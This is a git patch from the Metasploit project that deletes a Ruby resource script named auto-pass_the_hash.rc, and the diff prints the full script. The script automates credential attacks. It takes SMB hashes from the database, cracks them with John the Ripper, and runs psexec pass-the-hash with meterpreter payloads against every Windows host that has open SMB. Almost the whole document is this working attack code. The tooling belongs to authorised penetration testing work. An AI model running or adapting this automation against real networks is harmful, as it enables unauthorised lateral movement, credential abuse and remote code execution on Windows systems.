From b3138ce3bc64ced97996331b542125153fb094b5 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 17 Jan 2012 12:18:28 -0600 Subject: [PATCH] We don't want this one due to bad naming --- scripts/resource/auto-pass_the_hash.rc | 99 -------------------------- 1 file changed, 99 deletions(-) delete mode 100644 scripts/resource/auto-pass_the_hash.rc diff --git a/scripts/resource/auto-pass_the_hash.rc b/scripts/resource/auto-pass_the_hash.rc deleted file mode 100644 index ce9c032cff..0000000000 --- a/scripts/resource/auto-pass_the_hash.rc +++ /dev/null @@ -1,99 +0,0 @@ -# auto-pass_the_hash.rc -# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de) - -# This Metasploit RC-File could be used to automatically check already discovered windows hashes -# with jtr before login testing, after jtr is started it uses the hashes with pass the hash -# against windows fileservices. -> first we have to fill up the db with operating system infos -# we use psexec only against windows systems. Hint: smb_version - - - -#psexec needs a payload -if framework.datastore['PAYLOAD'] - pload = framework.datastore['PAYLOAD'] -else #just to get sure that we have a backup payload - pload = "windows/meterpreter/bind_tcp" -end - -if pload =~ /reverse/ and not framework.datastore['LHOST'] - print_error("You have to set LHOST globally!") - return -end - -if (framework.datastore['JOHN'] == "true") # we can set a global JOHN Option to control the usage of the jtr modules - jotr = 1 -else - jotr = 0 -end - -if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it - verbose = 1 #true -else - verbose = 0 -end - -def infos(serv,creds,host) - print_line("") - print_line("====================================") - print_line("IP: #{host.address}") - print_line("OS: #{host.os_name}") - print_line("Servicename: #{serv.name}") - print_line("Service Port: #{serv.port.to_i}") - print_line("Service Protocol: #{serv.proto}") - print_line("user: #{creds.user}") - print_line("pass: #{creds.pass}") - print_line("====================================") - print_line("") -end - -framework.db.creds.each do |creds| # just checking if we have any smb_hashes in the creds db - next if (creds.ptype !~ /smb_hash/) - - if (jotr == 1) - # first checking weak windows hashes with john ... because of the filtering before, we are sure that - # this is a windows hash - # on the first found hash we are going to analyse all hashes - then we set jotr to 0 - - print_line("using jtr_crack_fast") - run_single("use auxiliary/analyze/jtr_crack_fast") - # we use the info from Msf::Config.install_root and append the following path to it (thx to sinn3r) - run_single("set JOHN_BASE #{Msf::Config.install_root}/data/john") - run_single("set JOHN_PATH #{Msf::Config.install_root}/data/john") - run_single("run -j") - run_single("back") - jotr = 0 # jtr modules tries to crack all smb_hashes from the db ... so we could leave it now - end - - smbhash = creds.pass - username = creds.user - - framework.db.hosts.each do |host| - next if (host.os_name !~ /Windows/) # pass the hash works just for Win - - host.services.each do |serv| - next if not serv.host - next if (serv.state != ServiceState::Open) - next if (serv.name !~ /smb/) - - print_line("using psexec - Pass the hash") - if(verbose == 1) - infos(serv,creds,host) - end - run_single("use exploit/windows/smb/psexec") - run_single("set RHOST #{host.address}") - run_single("set RPORT #{serv.port}") - run_single("set SMBUser #{username}") - run_single("set SMBPass #{smbhash}") - run_single("set PAYLOAD #{pload}") - if pload =~ /reverse/ - run_single("set LPORT #{(rand(0x8fff) + 4000).to_s}") - end - if(verbose == 1) - run_single("set VERBOSE true") - end - run_single("exploit -j -z") - run_single("back") - end - end -end -